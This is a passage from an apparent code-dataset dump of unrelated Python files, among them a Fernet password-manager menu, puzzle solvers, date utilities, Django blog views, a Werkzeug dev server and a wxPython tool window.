        [left_y, right_y, bottom_z, top_z] = get_polygon_corner(polygon)
        squares = []
        if bottom_z <= 0 and top_z > 0:
            # split at z = 0 so squares align with the axis on both sides
            squares0 = squarize_rectangle(left_y, right_y, bottom_z, 0, resolution, tolerance)
            squares1 = squarize_rectangle(left_y, right_y, 0, top_z, resolution, tolerance)
            squares = [*squares0, *squares1]
        else:
            squares = squarize_rectangle(left_y, right_y, bottom_z, top_z, resolution, tolerance)
        for square in squares:
            squares_shapes.append(square)
            squares_strength.append(slice_polygons_strengths[id])
    return [squares_shapes, squares_strength]
|
21,571 | 74e6cdc134677c76f94145c3cd0f39c90cc609b8 | from cryptography.fernet import Fernet
from os import system
def menu():
    """Render the main menu and return the user's choice (an int, 1-5).

    Re-prompts until a valid option is entered.
    Fixes vs. original: the `x == True` loop flag is replaced by
    `while True` + return, the unused `inp` variable is dropped, and the
    bare `except:` (which also swallowed KeyboardInterrupt/SystemExit) is
    narrowed to ValueError from the int() conversion.
    """
    choice_list = [1, 2, 3, 4, 5]
    while True:
        system('cls')  # NOTE(review): Windows-only; POSIX would need 'clear'
        print('|-------------------------------------|')
        print('| P A S S W O R D M A N A G E R |')
        print('|-------------------------------------|')
        print('| |')
        print('| [1] Open List |')
        print('| [2] Search List |')
        print('| [3] Add Service |')
        print('| [4] Update Service |')
        print('| [5] Close |')
        print('| |')
        print('|-------------------------------------|')
        try:
            choice = int(input('Make your choice: '))
            if choice in choice_list:
                return choice
        except ValueError:
            print('Option not available.')
            input('Click enter and try again ')
def write_key():
    """Generate a fresh Fernet key and persist it to key.key
    (overwrites any existing key file)."""
    fresh_key = Fernet.generate_key()
    with open("key.key", "wb") as key_file:
        key_file.write(fresh_key)
def load_key():
    """Read and return the Fernet key bytes stored in key.key.

    Bug fix: the original did `open(...).read()` and never closed the
    file handle; a context manager guarantees the close.
    """
    with open("key.key", "rb") as key_file:
        return key_file.read()
def encrypt(filename, key):
    """Encrypt *filename* in place using the Fernet *key*."""
    fernet = Fernet(key)
    with open(filename, 'rb') as file:
        plaintext = file.read()
    ciphertext = fernet.encrypt(plaintext)
    with open(filename, "wb") as file:
        file.write(ciphertext)
def decrypt(filename, key):
    """Decrypt *filename* in place using the Fernet *key*."""
    fernet = Fernet(key)
    with open(filename, "rb") as file:
        ciphertext = file.read()
    plaintext = fernet.decrypt(ciphertext)
    with open(filename, "wb") as file:
        file.write(plaintext)
|
21,572 | 735ee364aeec90761ddcffd530189820ac3109e5 | import sys
def find_time(data):
    """Return the minimum time (seconds) for everyone to get down.

    data layout (see the stdin-parsing loop below):
      data[0] elevator seconds per floor
      data[1] elevator stop duration
      data[2] walking seconds per floor
      data[3] number of floors (unused)
      data[5] list of each person's floor
    Strategy: for every candidate threshold floor, people below it walk
    down while the rest ride the elevator bottom-to-top; the answer is the
    best worst-case time over all thresholds, including everyone walking.
    """
    ele_floor = data[0]
    stop_floor = data[1]
    walk_floor = data[2]
    num_floor = data[3]
    # unique occupied floors, ascending
    floor_arr =list(set(data[5]))
    floor_arr.sort()
    num_ppl = len(floor_arr)
    # NOTE(review): assumes no scenario can exceed 100000 seconds -- confirm
    # against the problem's input bounds.
    min_sec = 100000
    record = {}
    for floor_th in floor_arr:
        # floor_th = lowest floor that takes the elevator in this scenario
        if floor_th in record:
            continue
        cur_record = {}
        ele_time = 0  # elevator clock including stop times so far
        cur_sec = 0   # worst individual time in this scenario
        for i in range(num_ppl):
            if floor_arr[i] in cur_record:
                continue
            if floor_arr[i] < floor_th:
                # below the threshold: this person walks down
                per_sec = (floor_arr[i]-1)*walk_floor
                cur_record[floor_arr[i]] = per_sec
                if per_sec > cur_sec:
                    cur_sec = per_sec
            else:
                if ele_time == 0:
                    # first rider: elevator goes straight down with them
                    per_sec = (floor_arr[i]-1) * ele_floor
                    ele_time = per_sec + stop_floor
                    cur_record[floor_arr[i]] = per_sec
                    if per_sec > cur_sec:
                        cur_sec = per_sec
                else:
                    # later riders wait for the elevator to climb back up
                    per_sec = ele_time + (floor_arr[i]-floor_arr[i-1])*ele_floor
                    cur_record[floor_arr[i]] = per_sec
                    ele_time += (floor_arr[i]-floor_arr[i-1])*ele_floor + stop_floor
                    if per_sec > cur_sec:
                        cur_sec = per_sec
        if cur_sec < min_sec:
            min_sec = cur_sec
        record[floor_th] = min_sec
    # scenario where even the highest person walks all the way down
    last_cal = (floor_arr[num_ppl-1]-1)*walk_floor
    if last_cal < min_sec:
        min_sec = last_cal
    return min_sec
# Parse the multi-case stdin stream: the first line is the case count,
# then each case is 5 scalar lines followed by one line of
# space-separated floor numbers (the 6th line).
first_line = 1
cur_case = 0
cur_case_line = 0
all_data = {}
for line in sys.stdin:
    if first_line:
        # skip the case-count header line
        first_line = 0
    else:
        cur_case_line +=1
        if cur_case not in all_data:
            all_data[cur_case] = [int(line.strip('\n'))]
        elif cur_case_line < 6:
            all_data[cur_case].append(int(line.strip('\n')))
        else:
            # 6th line of a case: the list of people's floors
            all_data[cur_case].append(list(map(int,line.strip('\n').split(' '))))
        if cur_case_line == 6:
            # case complete: solve and reset for the next one
            print(find_time(all_data[cur_case]))
            cur_case += 1
            cur_case_line = 0
21,573 | 2090c063a5776b1c2eb828880563d056f541c1d3 | import os
import ycm_core
# Compile flags handed to libclang for every file in this project
# (C11, warnings enabled, xcb headers on the include path).
flags = [
'-x', 'c',
'-std=c11',
'-I', '/usr/include/xcb/',
'-Wall',
'-Wextra',
'-pedantic',
'-DUSE_CLANG_COMPLETER'
]
def DirectoryOfThisScript():
    """Absolute path of the directory containing this config file."""
    here = os.path.abspath(__file__)
    return os.path.dirname(here)
def FlagsForFile(filename):
    """YouCompleteMe entry point: compile flags for *filename*.

    The same flag list is returned for every file, and YCM is told to
    cache the result.
    """
    return dict(flags=flags, do_cache=True)
|
21,574 | 8854c4b22bfc8b76e92d31e1f089bb4656d280a8 | import time
import pytz
import datetime
DATE_FLAG = "%Y%m%d"
DATE_ONLY = "%Y-%m-%d"
DATETIME_FLAG = "%Y%m%d%H%M"
FULL_DATETIME = "%Y-%m-%d %H:%M:%S"
TIME_FLAG = "%H%M"
TIME_ONLY = "%H:%M:%S"
# get china time zone
def get_timezone():
    """Return the pytz tzinfo for China (Asia/Shanghai, UTC+8)."""
    return pytz.timezone('Asia/Shanghai')
# time string format detect, maybe not correct
def simple_format_detect(time_str):
    """Best-effort guess of the strptime format of *time_str*.

    Returns a format string (e.g. "%Y-%m-%d %H:%M:%S") or "unknown" when
    the layout cannot be recognised.

    Fixes vs. original: a time part with more than three ':' segments
    left `hour` unbound and raised UnboundLocalError (now "unknown"),
    and a lone "HH:MM" string is now recognised as "%H:%M" instead of
    falling through to "unknown".
    """
    parts = time_str.split(" ")
    if len(parts) > 2:
        return "unknown"
    if len(parts) == 2:
        # "<date> <time>" form
        if len(parts[0].split("-")) == 3:
            date = "%Y-%m-%d"
        else:
            date = "%Y%m%d"
        time_part = parts[1]
        colon_count = len(time_part.split(":"))
        if colon_count == 3:
            hour = "%H:%M:%S"
        elif colon_count == 2:
            hour = "%H:%M"
        elif colon_count == 1:
            if len(time_part) == 6:
                hour = "%H%M%S"
            elif len(time_part) == 4:
                hour = "%H%M"
            else:
                return "unknown"
        else:
            # bug fix: original left `hour` unbound here (UnboundLocalError)
            return "unknown"
        return date + " " + hour
    # single token: date-only, time-only or compact datetime
    date_parts = time_str.split("-")
    if len(date_parts) > 3:
        return "unknown"
    if len(date_parts) == 3:
        return "%Y-%m-%d"
    if len(date_parts) == 2:
        return "%Y-%m"
    time_parts = time_str.split(":")
    if len(time_parts) == 3:
        return "%H:%M:%S"
    if len(time_parts) == 2:
        # generalisation: "HH:MM" previously returned "unknown"
        return "%H:%M"
    if len(time_parts) == 1:
        if len(time_str) == 12:
            return "%Y%m%d%H%M"
        elif len(time_str) == 8:
            return "%Y%m%d"
        return "unknown"
    return "unknown"
# convert time string to timestamp
def str_to_timestamp(time_str, tformat=FULL_DATETIME):
    """Parse *time_str* with *tformat* (falling back to auto-detection)
    and return a local-time POSIX timestamp, or 0 on failure.

    NOTE(review): the bare `except` clauses are the deliberate fallback
    mechanism here, but they also hide non-parse errors; narrowing them
    to ValueError/TypeError would be safer.
    """
    try:
        stime = time.strptime(time_str, tformat)
    except:
        # explicit format failed: try to detect the real one
        tformat = simple_format_detect(time_str)
        if tformat == "unknown":
            return 0
        try:
            stime = time.strptime(time_str, tformat)
        except:
            return 0
    return int(time.mktime(stime))
# convert time string to datetime
def str_to_datetime(time_str, tformat=FULL_DATETIME):
    """Parse *time_str* with *tformat* (falling back to auto-detection)
    and return a naive datetime, or None on failure."""
    try:
        dt = datetime.datetime.strptime(time_str, tformat)
    except:
        tformat = simple_format_detect(time_str)
        if tformat == "unknown":
            return None
        try:
            dt = datetime.datetime.strptime(time_str, tformat)
        except:
            return None
    return dt
# convert time string to time
def str_to_time(time_str, tformat=FULL_DATETIME):
    """Parse *time_str* with *tformat* (falling back to auto-detection)
    and return a time.struct_time, or None on failure."""
    try:
        t = time.strptime(time_str, tformat)
    except:
        tformat = simple_format_detect(time_str)
        if tformat == "unknown":
            return None
        try:
            t = time.strptime(time_str, tformat)
        except:
            return None
    return t
# convert timestamp to datetime
def timestamp_to_datetime(timestamp):
    """Convert a POSIX timestamp to a naive datetime in UTC+8 (China)."""
    utc_moment = datetime.datetime.utcfromtimestamp(timestamp)
    return utc_moment + datetime.timedelta(hours=8)
# convert time string format by self defined
def str_convert_by_defined(time_str, to_format, from_format=FULL_DATETIME):
    """Re-format *time_str* from *from_format* into *to_format*.

    Returns the sentinel strings "frominvalid" when the input cannot be
    parsed and "toinvalid" when the output format is rejected.
    """
    dt = str_to_datetime(time_str, from_format)
    if dt is None:
        return "frominvalid"
    try:
        return dt.strftime(to_format)
    except:
        # NOTE(review): bare except kept for parity with the rest of the
        # module; strftime failures are rare (e.g. bad format types).
        return "toinvalid"
# convert time string format to date flag format
def str_to_dateflag(time_str, from_format=FULL_DATETIME):
    """Re-format to compact date "YYYYMMDD"."""
    return str_convert_by_defined(time_str, DATE_FLAG, from_format)
# convert time string format to date int format
def str_to_dateint(time_str, from_format=FULL_DATETIME):
    """Re-format to dashed date "YYYY-MM-DD"."""
    return str_convert_by_defined(time_str, DATE_ONLY, from_format)
# convert time string format to date time flag format
def str_to_datetimeflag(time_str, from_format=FULL_DATETIME):
    """Re-format to compact datetime "YYYYMMDDHHMM"."""
    return str_convert_by_defined(time_str, DATETIME_FLAG, from_format)
# convert time string format to full date time format
def str_to_fulldatetime(time_str, from_format=FULL_DATETIME):
    """Re-format to "YYYY-MM-DD HH:MM:SS"."""
    return str_convert_by_defined(time_str, FULL_DATETIME, from_format)
# convert time string format to time flag format
def str_to_timeflag(time_str, from_format=FULL_DATETIME):
    """Re-format to compact time "HHMM"."""
    return str_convert_by_defined(time_str, TIME_FLAG, from_format)
# convert time string format to time only format
def str_to_timeonly(time_str, from_format=FULL_DATETIME):
    """Re-format to "HH:MM:SS"."""
    return str_convert_by_defined(time_str, TIME_ONLY, from_format)
21,575 | 0ef61a0a74ed2f3e8327c4da56c4fa3ed6ba1253 | import bpy
from .. Node.Actuators.SFX_Actuators_Basic_Inset import SFX_Actuators_Basic_Inset
from .. Node.Actuators.SFX_Actuators_Expanded_Inset import SFX_Actuators_Expanded_Inset
from .. Node.Actuators.SFX_Digtwin_Basic_Inset import SFX_Digtwin_Basic_Inset
from .. Node.Actuators.SFX_Digtwin_Expanded_Inset import SFX_Digtwin_Expanded_Inset
from .. Node.Sensors.Joystick.SFX_Joystick_Inset import SFX_Joystick_Inset
class sfx(bpy.types.PropertyGroup):
    ''' Defines sfx '''
    # Blender registration id for this property group.
    bl_idname = "SFX"
    # NOTE(review): these dicts are CLASS attributes, shared by every sfx
    # instance -- presumably intentional global registries keyed by node
    # category; confirm instances are not expected to have private copies.
    clocks ={}
    sensors ={}
    cues ={}
    kinematics ={}
    helpers ={}
    actuators ={}
|
21,576 | 50edcb84c78ed1c14ae6899b07752700e86d5183 | from __future__ import unicode_literals
import six
class ConsumeLater(Exception):
    """
    Exception that says that the current message should be re-queued back
    onto its channel as it's not ready to be consumed yet (e.g. global order
    is being enforced)
    """
    # Marker exception: carries no payload, caught by the channel runtime.
    pass
class ResponseLater(Exception):
    """
    Exception raised inside a Django view when the view has passed
    responsibility for the response to another consumer, and so is not
    returning a response.
    """
    pass
class RequestTimeout(Exception):
    """
    Raised when it takes too long to read a request body.
    """
    pass
class RequestAborted(Exception):
    """
    Raised when the incoming request tells us it's aborted partway through
    reading the body.
    """
    pass
class DenyConnection(Exception):
    """
    Raised during a websocket.connect (or other supported connection) handler
    to deny the connection.
    """
    pass
class ChannelSocketException(Exception):
    """
    Base Exception is intended to run some action ('run' method)
    when it is raised at a consumer body
    """
    def run(self, message):
        # Subclasses implement the action to perform on the message's
        # reply channel when the exception is caught by the framework.
        raise NotImplementedError
class WebsocketCloseException(ChannelSocketException):
    """
    ChannelSocketException based exceptions for close websocket connection with code
    """
    def __init__(self, code=None):
        # Valid close codes are 1000 or anything in [3000, 4999].
        # Bug fix: the original chained all checks with `and`, so any
        # INTEGER outside the valid range (e.g. 2000) was silently
        # accepted, and non-integers hit `3000 <= code` and raised
        # TypeError instead of the intended ValueError.
        if code is not None and (
                not isinstance(code, six.integer_types)
                or (code != 1000 and not (3000 <= code <= 4999))):
            raise ValueError("invalid close code {} (must be 1000 or from [3000, 4999])".format(code))
        self._code = code
    def run(self, message):
        # Closing only makes sense on a websocket reply channel.
        if message.reply_channel.name.split('.')[0] != "websocket":
            raise ValueError("You cannot raise CloseWebsocketError from a non-websocket handler.")
        message.reply_channel.send({"close": self._code or True})
class SendNotAvailableOnDemultiplexer(Exception):
    """
    Raised when trying to send with a WebsocketDemultiplexer. Use the multiplexer instead.
    """
    # Marker exception: no payload, raised to redirect misuse of the API.
    pass
21,577 | 0fb815a9c2d91f87014c4b9de31f9fe1e3224673 | # 3. Определить, какие из слов «attribute», «класс», «функция», «type» невозможно записать
# в байтовом типе.
# Demo: only ASCII-only words can be written as bytes literals; the
# Cyrillic words must be encoded instead.
text = b'attribute'
# unicode_escape encoding works for ASCII text too.
text = 'attribute'.encode('unicode_escape')
print(type(text))
print(text)
print('----------------------------------------------------')
#text = b'класс'
# SyntaxError: bytes can only contain ASCII literal characters.
text = 'класс'.encode('unicode_escape')
print(type(text))
print(text)
print('----------------------------------------------------')
#text = b'функция'
# SyntaxError: bytes can only contain ASCII literal characters.
text = 'функция'.encode('unicode_escape')
print(type(text))
print(text)
print('----------------------------------------------------')
text = b'type'
text = 'type'.encode('unicode_escape')
print(type(text))
print(text)
21,578 | e600719e3ad7842ed4271f4d53346c68bbf0b0d8 | n = int(input())
# Greedy: cut trees in ascending growth-rate order; each tree's cost is
# its current height plus growth accumulated while waiting its turn.
Hi = list(map(int,input().split()))   # initial heights
Ai = list(map(int,input().split()))   # growth per day
result =0
count = 0
from queue import PriorityQueue
que = PriorityQueue(maxsize=n)
# Queue orders by (growth rate, height): slowest growers come out first.
for i in range(n):
    que.put((Ai[i], Hi[i]))
while not que.empty():
    ai,hi = que.get()
    # The `count`-th tree cut has grown `ai * count` since day 0.
    result += ai*count + hi
    count += 1
print(result)
##첫번째 생각했던 코딩인데 왜 안됐는지 생각중
##n = int(input())
##
##Hi = list(map(int,input().split()))
##Ai = list(map(int,input().split()))
##print("Hi",Hi)
##
##expect = Hi[:]
##result = 0
##numbering = [0]*n
##
##for ex_i in range(n):
## expect[ex_i] += (n-1)*Ai[ex_i]-Hi[ex_i]
##print(expect)
##
##
###i는 몇번째 날에 나무 밸건지, 실제 계산을 위한 수
##for i in range(n):
## cut_tree_index=expect.index(max(expect))
## numbering[n-i-1]=cut_tree_index
## expect[cut_tree_index]=0
#### print("cut_tree_index: ",cut_tree_index)
#### print(expect[cut_tree_index])
#### print("expect : ",expect)
#### print("numbering : ",numbering)
##
##print("Hi",Hi)
##print("Ai",Ai)
##
##
##for j in range(n):
##
## result += Hi[numbering[j]] + j*Ai[numbering[j]]
## print(j)
## print(result)
##
|
21,579 | 8e27c43b56dbfca9870568acd563bac6731eb535 | from django.contrib import messages
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.shortcuts import render, redirect, HttpResponseRedirect
from models import Post
from signupModel import SignUpForm
def login_view(request):
    """Log a user in by username or email.

    Already-authenticated users are redirected to the main page. On POST,
    an '@' in the username field is treated as an email and resolved to a
    username first.

    Bug fix: the bare `except:` around the email lookup also swallowed
    database errors and typos; it is narrowed to the lookup's own
    exceptions.
    """
    if request.user.is_authenticated():
        messages.warning(request, 'you allready loged in')
        return redirect(main_page_view)
    else:
        if request.method == "POST":
            username = request.POST['username']
            password = request.POST['password']
            if '@' in username:
                # Resolve an email address to its account's username.
                try:
                    username = User.objects.get(email=username).username
                except (User.DoesNotExist, User.MultipleObjectsReturned):
                    return render(request, 'login.html', {"error": "your email is not correct"})
            user = authenticate(request, username=username, password=password)
            if user is not None:
                login(request, user)
                return redirect(main_page_view)
            else:
                return render(request, 'login.html', {"error": "user or password are incorrect"})
        else:
            return render(request, 'login.html', )
def logout_view(request):
    """End the current session and show the login page."""
    logout(request)
    return render(request, 'login.html', )
def signup_view(request):
    """Register a new account and log it in immediately.

    Authenticated users are redirected to the main page; GET renders an
    empty form; a valid POST creates the user, authenticates with the raw
    password, and redirects to the main page.
    """
    if request.user.is_authenticated():
        messages.warning(request, 'you allready loged in')
        return redirect(main_page_view)
    else:
        if request.method == 'POST':
            form = SignUpForm(request.POST)
            if form.is_valid():
                form.save()
                username = form.cleaned_data.get('username')
                raw_password = form.cleaned_data.get('password1')
                # Authenticate with the just-created credentials so
                # login() gets a backend-annotated user object.
                user = authenticate(username=username, password=raw_password)
                login(request, user)
                messages.info(request, 'you have loged in')
                return redirect(main_page_view)
            # NOTE(review): invalid POST falls through and re-renders the
            # bound form below, showing its validation errors.
        else:
            form = SignUpForm()
        return render(request, 'signup.html', {'form': form})
@login_required(login_url='/blog/login/')
def main_page_view(request):
    """Blog index: create a post on POST, list all posts on GET.

    Posts are ordered by published_date (ascending).
    """
    if request.method == 'POST' and request.user.is_authenticated():
        title = request.POST.get('title')
        text = request.POST.get('text')
        Post.objects.create(author=request.user, title=title, text=text)
        # Redirect after POST so a refresh does not duplicate the post.
        return HttpResponseRedirect('/blog')
    else:
        username = request.user.get_username()
        posts = Post.objects.order_by('published_date').all()
        return render(request, 'blog.html',
                      {
                          'posts': posts,
                          'userlogedin': True,
                          'username': username
                      })
@login_required(login_url='/blog/login/')
def post_view(request, pk):
    """Render a single post by primary key.

    NOTE(review): Post.objects.get raises DoesNotExist (500) for unknown
    pk; get_object_or_404 would be the conventional choice.
    """
    post = Post.objects.get(id=pk)
    username = request.user.get_username()
    return render(request, 'post.html',
                  {
                      'post': post,
                      'userlogedin': True,
                      'username': username
                  })
21,580 | 295dc4630b427e54cf82d0e9b84536dae6c31dc1 | from tkinter import Tk, Label, PhotoImage
root = Tk()  # the top-level application window
# Load the GIF into a form tkinter widgets can display.
photo = PhotoImage(file='peace.gif')
peace = Label(master=root,
              image=photo,
              width=300,   # width of label, in pixels
              height=180)  # height of label, in pixels
peace.pack()
root.mainloop()  # blocks until the window is closed
|
21,581 | d9654845debc7dba06b54dfe0521a872c2349a96 | #!/usr/bin/python
""" This Werkzeug server is used only for development and debugging """
import os, optparse, sys
from os.path import dirname, exists, join, isfile
import OpenSSL.SSL as ssl
import newhive.config as config
from newhive.app import application
from werkzeug.serving import run_simple, make_ssl_devcert
# caution, broken in some obscure way
#def wsgi_no_cache(app):
# def new_app(environ, start_response):
# def new_start_response(status, headers, **args):
# headers.append(('Cache-Control', 'no-cache, no-store, must-revalidate'))
# return start_response(status, headers, **args)
# return app(environ, new_start_response)
# return new_app
# undfortunately this doesn't work for static files
# (need to subclass the server for that), so use your own cache killing solution!
#if config.debug_mode: application = wsgi_no_cache(application)
def run_dev_server(http_only=False, threaded=False):
    """Run the Werkzeug development server.

    Creates a self-signed dev certificate on first use, then serves
    either HTTPS only (config.always_secure), HTTP only (http_only),
    or both by fork()ing: the parent serves plain HTTP and the child
    serves HTTPS.  Blocks until the server exits.
    """
    # version of SSL included by werkzeug from pip is broken. Use github
    ssl_prefix = join(config.src_home, 'lib', 'tmp', 'ssl')
    if not isfile(ssl_prefix + '.key'):
        # First run: generate a self-signed localhost cert/key pair.
        make_ssl_devcert(ssl_prefix, host='localhost', cn=None)
    ssl_context = ssl.Context(ssl.SSLv23_METHOD)
    ssl_context.use_certificate_file(ssl_prefix + '.crt')
    ssl_context.use_privatekey_file(ssl_prefix + '.key')
    # run_simple is not so simple
    def run_hive(port, ssl=False):
        # Serve `application` on 0.0.0.0:port; /lib is served statically
        # from the source tree.  Blocks for the lifetime of the server.
        run_simple(
            '0.0.0.0'
            , port
            , application
            , threaded = threaded
            , use_reloader = True
            , use_debugger = config.debug_mode
            , use_evalex = config.debug_unsecure # from werkzeug.debug import DebuggedApplication
            , static_files = { '/lib' : join(config.src_home, 'lib') }
            , ssl_context = ssl_context if ssl else None
            #, processes = 0
        )
    if config.always_secure:
        run_hive(config.ssl_port, True)
    elif http_only:
        run_hive(config.plain_port)
    else:
        # Serve both protocols: parent takes HTTP, child takes HTTPS.
        child = os.fork()
        if(child):
            run_hive(config.plain_port)
        else:
            run_hive(config.ssl_port, True)
if __name__ == '__main__':
    # Command-line flags override the defaults from newhive.config.
    parser = optparse.OptionParser()
    parser.add_option("-p", "--port", action="store", type="int", dest="port")
    parser.add_option("-s", "--secure-port", action="store", type="int", dest="secure_port",
        help='Defaults to -p argument + 1 unless given --ssl-only')
    parser.add_option("--ssl-only", action="store_true", dest="ssl_only", default=False)
    parser.add_option("-1", "--plain-only", action="store_true", dest="plain_only", default=False)
    parser.add_option("-d", "--debug", action="store_true", dest="debug")
    parser.add_option("--secure", action="store_true", dest="secure", default=False)
    parser.add_option("--threaded", action="store_true", dest="threaded", default=False)
    (options, args) = parser.parse_args()
    config.plain_port = options.port or config.plain_port
    #config.ssl_port = options.secure_port or options.port if options.ssl_only else options.port + 1
    config.always_secure = options.secure or config.always_secure
    config.debug_mode = options.debug or config.debug_mode
    config.webassets_debug = options.debug or config.webassets_debug
    config.interactive = True
    # NOTE(review): duplicate of the always_secure assignment above; harmless.
    config.always_secure = options.secure or config.always_secure
    config.threaded_dev_server = options.threaded or config.threaded_dev_server
    run_dev_server(options.plain_only, config.threaded_dev_server)
21,582 | 8a381e002922e3c59f7fd6e161d1c85520b2492e | # -*- coding: utf-8 -*-
"""
Created on Sun Oct 21 14:55:53 2018
@author: Admin
"""
import pandas as pd
import numpy as np
# Raw strings so the backslashes in Windows paths are never treated as
# escape sequences (e.g. "\A..." triggers an invalid-escape warning and
# will be an error in future Python versions).
df_path = r"C:\ASM exam\cds_spread5y_2001_2016.dta"
# Read the Stata file once via the path variable; it was previously
# re-spelled inline and the variable left unused.
data = pd.io.stata.read_stata(df_path)
data.to_csv('my_stata_file.csv')
df = pd.read_csv('my_stata_file.csv')
print(df['gvkey'])
a = df.gvkey.unique()
np.savetxt('k1.txt', a, fmt='% 4d')  # saving gvkeys into text file
df1 = pd.read_csv('crsp.csv')
d3 = pd.merge(df, df1, on='gvkey')  # merging based on gvkey
|
21,583 | cd181c347f14fe4ae4db2adcc88ced59c9949ea2 | #!/usr/bin/env python
import wx
import wx.aui
from views.PTModuleWindow import PTModuleWindow
from views.PTLoggerWindow import PTLoggerWindow
from views.PTSpecRepoFrame import PTSpecRepoFrame
from views.PTCodeRepoFrame import PTCodeRepoFrame
from views.PTEnvironmentFrame import PTEnvironmentFrame
from views.PTAddLocalModuleFrame import PTAddLocalModuleFrame
class PTFrame (wx.Frame):
    """Main window of the iOS develop tools application.

    Hosts a module-list notebook (centre pane) and a logger pane (left),
    laid out by wx.aui.  Secondary frames (podspec repo, code repo,
    commands/environment, add-local-module) are created lazily and
    tracked in attributes so at most one of each is open at a time.
    """

    mgr = None            # wx.aui.AuiManager driving the pane layout
    moduleWindow = None   # PTModuleWindow shown in the centre notebook
    loggerWindow = None   # PTLoggerWindow shown in the left pane
    sepcRepoFrame = None  # podspec repo frame (sic), None while closed
    codeRepoFrame = None  # code repo frame, None while closed
    envFrame = None       # commands/environment frame, None while closed
    localFrame = None     # add-local-module frame, None while closed
    loggerBtn = None      # button toggling logger pane visibility

    def __init__(self):
        super(PTFrame, self).__init__(None, wx.ID_ANY, u"iOS Develop Tools", size=(1000, 600))
        self.SetupMenuBar()
        self.SetupUI()
        self.Bind(wx.EVT_CLOSE, self.OnClose)
        self.CentreOnScreen()
        self.Show(True)
        # self.OnDisplayLogger(None)

    def SetupMenuBar(self):
        # Build Add / Configs / Help menus and bind their handlers.
        addMenu = wx.Menu()
        addLocalModuleItem = addMenu.Append(-1, "&Add Local Module...\tCtrl-A", "Add local module")
        fileMenu = wx.Menu()
        specRepoItem = fileMenu.Append(-1, "&Podspec Repo List...\tCtrl-P", "Show podspec repo list")
        codeRepoItem = fileMenu.Append(-1, "&Code Repo List...\tCtrl-C", "Show code repo list")
        fileMenu.AppendSeparator()
        environmentItem = fileMenu.Append(-1, "&Commands...\tCtrl-E", "Show commands paths")
        exitItem = fileMenu.Append(wx.ID_EXIT)
        helpMenu = wx.Menu()
        aboutItem = helpMenu.Append(wx.ID_ABOUT)
        menuBar = wx.MenuBar()
        menuBar.Append(addMenu, "&Add")
        menuBar.Append(fileMenu, "&Configs")
        menuBar.Append(helpMenu, "&Help")
        self.SetMenuBar(menuBar)
        self.Bind(wx.EVT_MENU, self.OnAddLocalModule, addLocalModuleItem)
        self.Bind(wx.EVT_MENU, self.OnShowSpecRepoList, specRepoItem)
        self.Bind(wx.EVT_MENU, self.OnShowCodeRepoList, codeRepoItem)
        self.Bind(wx.EVT_MENU, self.OnShowCommands, environmentItem)
        self.Bind(wx.EVT_MENU, self.OnExit, exitItem)
        self.Bind(wx.EVT_MENU, self.OnAbout, aboutItem)

    def OnAddLocalModule(self, event):
        # Open the add-local-module frame (only one instance at a time).
        if self.localFrame == None:
            self.localFrame = PTAddLocalModuleFrame(self, self.OnLogCallback, self.OnAddLocalModuelCallback, self.OnCloseAddLocalFrameCallback)

    def OnCloseAddLocalFrameCallback(self):
        # Child frame closed: drop the reference so it can be reopened.
        self.localFrame = None

    def OnAddLocalModuelCallback(self, module, isTrunk):
        # Forward the newly added module to the module list window.
        self.moduleWindow.OnAddModule(module, isTrunk)

    def OnShowSpecRepoList(self, event):
        if self.sepcRepoFrame == None:
            self.sepcRepoFrame = PTSpecRepoFrame(self, self.OnLogCallback, self.OnCloseSpecRepoFrameCallback)

    def OnCloseSpecRepoFrameCallback(self):
        self.sepcRepoFrame = None

    def OnShowCodeRepoList(self, event):
        if self.codeRepoFrame == None:
            self.codeRepoFrame = PTCodeRepoFrame(self, self.OnLogCallback, self.OnCloseCodeRepoFrameCallback)

    def OnCloseCodeRepoFrameCallback(self):
        self.codeRepoFrame = None

    def OnShowCommands(self, event):
        if self.envFrame == None:
            self.envFrame = PTEnvironmentFrame(self, self.OnLogCallback, self.OnEnvFrameCallback)

    def OnEnvFrameCallback(self):
        self.envFrame = None

    def OnExit(self, event):
        self.Close(True)

    def OnAbout(self, event):
        wx.MessageBox("Nice to you.",
                      "Develop Tools",
                      wx.OK|wx.ICON_INFORMATION)

    def OnClose(self, event):
        # Uninitialise the AUI manager before destroying the frame,
        # otherwise wx.aui leaks its event handlers.
        self.mgr.UnInit()
        self.Destroy()

    def CreateContentWindow(self, panel):
        # Build the AUI-managed area: centre notebook with the module
        # list, plus a left pane holding the logger window.
        contentWindow = wx.Window(panel)
        self.mgr = wx.aui.AuiManager(contentWindow)
        panel = wx.Panel(contentWindow)
        topNotebook = wx.Notebook(panel, wx.ID_ANY)
        self.moduleWindow = PTModuleWindow(topNotebook, self.OnLogCallback)
        topNotebook.AddPage(self.moduleWindow, u"Module List")
        topNotebook.SetSelection(0)
        infoBox = wx.BoxSizer(wx.HORIZONTAL)
        infoBox.Add(topNotebook, 1, wx.EXPAND)
        panel.SetSizerAndFit(infoBox)
        centrePane = wx.aui.AuiPaneInfo().CenterPane().Name("content").CloseButton(False)
        self.mgr.AddPane(panel, centrePane)
        panel2 = wx.Panel(contentWindow)
        self.loggerWindow = PTLoggerWindow(panel2)
        logBox = wx.BoxSizer(wx.HORIZONTAL)
        logBox.Add(self.loggerWindow, 1, wx.EXPAND)
        panel2.SetSizerAndFit(logBox)
        leftPane = wx.aui.AuiPaneInfo().Left().Name("logger").CloseButton(False).MinSize((400, 600))
        self.mgr.AddPane(panel2, leftPane)
        self.mgr.Update()
        return contentWindow

    def CreateBottomWindow(self, panel):
        # Bottom strip containing the show/hide-logger toggle button.
        bottomWindow = wx.Window(panel)
        self.loggerBtn = wx.Button(bottomWindow, wx.ID_ANY, u"Hide Logger")
        self.loggerBtn.Bind(wx.EVT_BUTTON, self.OnDisplayLogger)
        hBox = wx.BoxSizer(wx.HORIZONTAL)
        hBox.Add(self.loggerBtn, 0)
        bottomWindow.SetSizerAndFit(hBox)
        return bottomWindow

    def OnDisplayLogger(self, event):
        # Toggle the logger pane and keep the button label in sync.
        loggerPane = self.mgr.GetPane("logger")
        isShown = loggerPane.IsShown()
        if isShown == True:
            self.loggerBtn.SetLabelText(u"Show Logger")
            loggerPane.Hide()
        else:
            self.loggerBtn.SetLabelText(u"Hide Logger")
            loggerPane.Show(True)
        self.mgr.Update()

    def SetupUI(self):
        self.SetBackgroundColour(wx.WHITE)
        panel = wx.Panel(self)
        vBox = wx.BoxSizer(wx.VERTICAL)
        vBox.Add(self.CreateContentWindow(panel), 1, wx.EXPAND)
